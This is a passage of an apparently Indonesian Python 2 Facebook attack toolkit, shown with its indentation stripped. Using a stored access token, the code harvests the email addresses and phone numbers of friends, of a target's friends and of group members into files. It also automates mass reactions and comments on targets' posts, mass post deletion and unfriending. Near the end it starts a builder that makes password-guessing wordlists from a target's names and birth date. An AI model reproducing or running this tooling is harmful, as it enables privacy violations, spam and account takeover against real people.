raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] There is nothing koneksi'
keluar()
def id_member_grup():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
id=raw_input(
'\x1b[1;91m[+] \x1b[1;92mID grup \x1b[1;91m:\x1b[1;97m ')
try:
r=requests.get(
'https://graph.facebook.com/group/?id=' + id + '&access_token=' + toket)
asw=json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Grup tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
simg=raw_input(
'\x1b[1;91m[+] \x1b[1;97mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
b=open(simg, 'w')
jalan(
'\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mWait a minute \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
re=requests.get('https://graph.facebook.com/' + id +
'/members?fields=name,id&access_token=' + toket)
s=json.loads(re.text)
for i in s['data']:
idmem.append(i['id'])
b.write(i['id'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + i['name']
print '\x1b[1;92mID \x1b[1;91m :\x1b[1;97m ' + i['id']
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah ID \x1b[1;96m%s' % len(idmem)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + simg
b.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(simg)
print '\x1b[1;91m[!] Grup tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] There is nothing koneksi'
keluar()
def email():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
mails=raw_input(
'\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r=requests.get(
'https://graph.facebook.com/me/friends?access_token=' + toket)
a=json.loads(r.text)
mpsh=open(mails, 'w')
jalan(
'\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mWait a minute \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x=requests.get('https://graph.facebook.com/' +
i['id'] + '?access_token=' + toket)
z=json.loads(x.text)
try:
em.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 40 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Email\x1b[1;96m%s' % len(em)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(mails)
print '\x1b[1;91m[!] Kesalahan terjadi'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] There is nothing koneksi'
keluar()
def emailfrom_teman():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
idt=raw_input(
'\x1b[1;91m[+] \x1b[1;92mMasukan ID Teman \x1b[1;91m: \x1b[1;97m')
try:
jok=requests.get('https://graph.facebook.com/' +
idt + '?access_token=' + toket)
op=json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Belum berteman'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
mails=raw_input(
'\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r=requests.get('https://graph.facebook.com/' +
idt + '/friends?access_token=' + toket)
a=json.loads(r.text)
mpsh=open(mails, 'w')
jalan(
'\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mWait a minute \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x=requests.get('https://graph.facebook.com/' +
i['id'] + '?access_token=' + toket)
z=json.loads(x.text)
try:
emfromteman.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 40 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Email\x1b[1;96m%s' % len(emfromteman)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] There is nothing koneksi'
keluar()
def nomor_hp():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
noms=raw_input(
'\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
url='https://graph.facebook.com/me/friends?access_token=' + toket
r=requests.get(url)
z=json.loads(r.text)
no=open(noms, 'w')
jalan(
'\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mWait a minute \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for n in z['data']:
x=requests.get('https://graph.facebook.com/' +
n['id'] + '?access_token=' + toket)
z=json.loads(x.text)
try:
hp.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mNomor\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 40 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Nomor\x1b[1;96m%s' % len(hp)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(noms)
print '\x1b[1;91m[!] Kesalahan terjadi'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] There is nothing koneksi'
keluar()
def hpfrom_teman():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
idt=raw_input(
'\x1b[1;91m[+] \x1b[1;92mMasukan ID Teman \x1b[1;91m: \x1b[1;97m')
try:
jok=requests.get('https://graph.facebook.com/' +
idt + '?access_token=' + toket)
op=json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Belum berteman'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
noms=raw_input(
'\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r=requests.get('https://graph.facebook.com/' +
idt + '/friends?access_token=' + toket)
a=json.loads(r.text)
no=open(noms, 'w')
jalan(
'\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mWait a minute \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x=requests.get('https://graph.facebook.com/' +
i['id'] + '?access_token=' + toket)
z=json.loads(x.text)
try:
hpfromteman.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mNomor\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 40 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Nomor\x1b[1;96m%s' % len(hpfromteman)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] There is nothing koneksi'
keluar()
def menu_bot():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Bot Reactions Target Post'
print '\x1b[1;37;40m2. Bot Reactions Grup Post'
print '\x1b[1;37;40m3. Bot Komen Target Post'
print '\x1b[1;37;40m4. Bot Komen Grup Post'
print '\x1b[1;37;40m5. Mass delete Post'
print '\x1b[1;37;40m6. Terima permintaan pertemanan'
print '\x1b[1;37;40m7. Hapus pertemanan'
print '\x1b[1;31;40m0. Back'
print
bot_select()
def bot_select():
bots=raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if bots == '':
print '\x1b[1;91m[!] Jangan kosong'
bot_select()
else:
if bots == '1':
menu_react()
else:
if bots == '2':
grup_react()
else:
if bots == '3':
bot_komen()
else:
if bots == '4':
grup_komen()
else:
if bots == '5':
deletepost()
else:
if bots == '6':
accept()
else:
if bots == '7':
unfriend()
else:
if bots == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + bots + ' \x1b[1;91mThere is nothing'
bot_select()
def menu_react():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. \x1b[1;97mLike'
print '\x1b[1;37;40m2. \x1b[1;97mLove'
print '\x1b[1;37;40m3. \x1b[1;97mWow'
print '\x1b[1;37;40m4. \x1b[1;97mHaha'
print '\x1b[1;37;40m5. \x1b[1;97mSedih'
print '\x1b[1;37;40m6. \x1b[1;97mMarah'
print '\x1b[1;31;40m0. Back'
print
react_select()
def react_select():
global tipe
aksi=raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Jangan kosong'
react_select()
else:
if aksi == '1':
tipe='LIKE'
react()
else:
if aksi == '2':
tipe='LOVE'
react()
else:
if aksi == '3':
tipe='WOW'
react()
else:
if aksi == '4':
tipe='HAHA'
react()
else:
if aksi == '5':
tipe='SAD'
react()
else:
if aksi == '6':
tipe='ANGRY'
react()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mThere is nothing'
react_select()
def react():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
ide=raw_input(
'\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
limit=raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
try:
oh=requests.get('https://graph.facebook.com/' + ide +
'?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah=json.loads(oh.text)
jalan(
'\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mWait a minute \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y=a['id']
reaksi.append(y)
requests.post('https://graph.facebook.com/' + y +
'/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(reaksi))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID Tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_react():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. \x1b[1;97mLike'
print '\x1b[1;37;40m2. \x1b[1;97mLove'
print '\x1b[1;37;40m3. \x1b[1;97mWow'
print '\x1b[1;37;40m4. \x1b[1;97mHaha'
print '\x1b[1;37;40m5. \x1b[1;97mSedih'
print '\x1b[1;37;40m6. \x1b[1;97mMarah'
print '\x1b[1;31;40m0. Back'
print
reactg_select()
def reactg_select():
global tipe
aksi=raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Jangan kosong'
reactg_select()
else:
if aksi == '1':
tipe='LIKE'
reactg()
else:
if aksi == '2':
tipe='LOVE'
reactg()
else:
if aksi == '3':
tipe='WOW'
reactg()
else:
if aksi == '4':
tipe='HAHA'
reactg()
else:
if aksi == '5':
tipe='SAD'
reactg()
else:
if aksi == '6':
tipe='ANGRY'
reactg()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mThere is nothing'
reactg_select()
def reactg():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
ide=raw_input('\x1b[1;91m[+] \x1b[1;92mID Grup \x1b[1;91m:\x1b[1;97m ')
limit=raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
ah=requests.get('https://graph.facebook.com/group/?id=' +
ide + '&access_token=' + toket)
asw=json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
try:
oh=requests.get('https://graph.facebook.com/v3.0/' + ide +
'?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah=json.loads(oh.text)
jalan(
'\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mWait a minute \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y=a['id']
reaksigrup.append(y)
requests.post('https://graph.facebook.com/' + y +
'/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(reaksigrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID Tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def bot_komen():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru"
ide=raw_input(
'\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
km=raw_input(
'\x1b[1;91m[+] \x1b[1;92mKomentar \x1b[1;91m:\x1b[1;97m ')
limit=raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km=km.replace('<>', '\n')
try:
p=requests.get('https://graph.facebook.com/' + ide +
'?fields=feed.limit(' + limit + ')&access_token=' + toket)
a=json.loads(p.text)
jalan(
'\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mWait a minute \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f=s['id']
komen.append(f)
requests.post('https://graph.facebook.com/' + f +
'/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(komen))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID Tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_komen():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru"
ide=raw_input(
'\x1b[1;91m[+] \x1b[1;92mID Grup \x1b[1;91m:\x1b[1;97m ')
km=raw_input('\x1b[1;91m[+] \x1b[1;92mKomentar \x1b[1;91m:\x1b[1;97m ')
limit=raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km=km.replace('<>', '\n')
try:
ah=requests.get(
'https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw=json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
p=requests.get('https://graph.facebook.com/v3.0/' + ide +
'?fields=feed.limit(' + limit + ')&access_token=' + toket)
a=json.loads(p.text)
jalan(
'\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mWait a minute \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f=s['id']
komengrup.append(f)
requests.post('https://graph.facebook.com/' + f +
'/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(komengrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID Tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def deletepost():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
nam=requests.get('https://graph.facebook.com/me?access_token=' + toket)
lol=json.loads(nam.text)
nama=lol['name']
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mFrom \x1b[1;91m: \x1b[1;97m%s' % nama
jalan('\x1b[1;91m[+] \x1b[1;92mMulai menghapus postingan unfaedah\x1b[1;97m ...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
asu=requests.get(
'https://graph.facebook.com/me/feed?access_token=' + toket)
asus=json.loads(asu.text)
for p in asus['data']:
id=p['id']
piro=0
url=requests.get('https://graph.facebook.com/' + id +
'?method=delete&access_token=' + toket)
ok=json.loads(url.text)
try:
error=ok['error']['message']
print '\x1b[1;91m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;91m] \x1b[1;95mGagal'
except TypeError:
print '\x1b[1;92m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;92m] \x1b[1;96mTerhapus'
piro += 1
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Koneksi Error'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def accept():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
limit=raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
r=requests.get('https://graph.facebook.com/me/friendrequests?limit=' +
limit + '&access_token=' + toket)
teman=json.loads(r.text)
if '[]' in str(teman['data']):
print '\x1b[1;91m[!] There is nothing permintaan pertemanan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mWait a minute \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for i in teman['data']:
gas=requests.post('https://graph.facebook.com/me/friends/' +
i['from']['id'] + '?access_token=' + toket)
a=json.loads(gas.text)
if 'error' in str(a):
print '\x1b[1;91m[+] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;91m Gagal'
print 40 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[+] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;92m Berhasil'
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def unfriend():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mWait a minute \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;97mStop \x1b[1;91mCTRL+C'
print
try:
pek=requests.get(
'https://graph.facebook.com/me/friends?access_token=' + toket)
cok=json.loads(pek.text)
for i in cok['data']:
nama=i['name']
id=i['id']
requests.delete(
'https://graph.facebook.com/me/friends?uid=' + id + '&access_token=' + toket)
print '\x1b[1;97m[\x1b[1;92mTerhapus\x1b[1;97m] ' + nama + ' => ' + id
except IndexError:
pass
except KeyboardInterrupt:
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def lain():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Buat postingan'
print '\x1b[1;37;40m2. Buat Wordlist'
print '\x1b[1;37;40m3. Akun Checker'
print '\x1b[1;37;40m4. Lihat daftar grup'
print '\x1b[1;37;40m5. Profile Guard'
print
print '\x1b[1;97m ->Coming soon<-'
print
print '\x1b[1;31;40m0. Back'
print
select_lain()
def select_lain():
other=raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if other == '':
print '\x1b[1;91m[!] Jangan kosong'
select_lain()
else:
if other == '1':
status()
else:
if other == '2':
wordlist()
else:
if other == '3':
check_akun()
else:
if other == '4':
grupsaya()
else:
if other == '5':
guard()
else:
if other == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + other + ' \x1b[1;91mThere is nothing'
select_lain()
def status():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
msg=raw_input(
'\x1b[1;91m[+] \x1b[1;92mKetik status \x1b[1;91m:\x1b[1;97m ')
if msg == '':
print '\x1b[1;91m[!] Jangan kosong'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
res=requests.get(
'https://graph.facebook.com/me/feed?method=POST&message=' + msg + '&access_token=' + toket)
op=json.loads(res.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mWait a minute \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mStatus ID\x1b[1;91m : \x1b[1;97m' + op['id']
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def wordlist():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi data lengkap target dibawah'
print 40 * '\x1b[1;97m\xe2\x95\x90'
a=raw_input('\x1b[1;91m[+] \x1b[1;92mNama Depan \x1b[1;97m: ')
file=open(a + '.txt', 'w')
b=raw_input('\x1b[1;91m[+] \x1b[1;92mNama Tengah \x1b[1;97m: ')
c=raw_input('\x1b[1;91m[+] \x1b[1;92mNama Belakang \x1b[1;97m: ')
d=raw_input('\x1b[1;91m[+] \x1b[1;92mNama Panggilan \x1b[1;97m: ')
e=raw_input(
'\x1b[1;91m[+] \x1b[1;92mDate of birth >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
f=e[0:2]
g=e[2:4]
h=e[4:]
print 40 * '\x1b[1;97m\xe2\x95\x90'
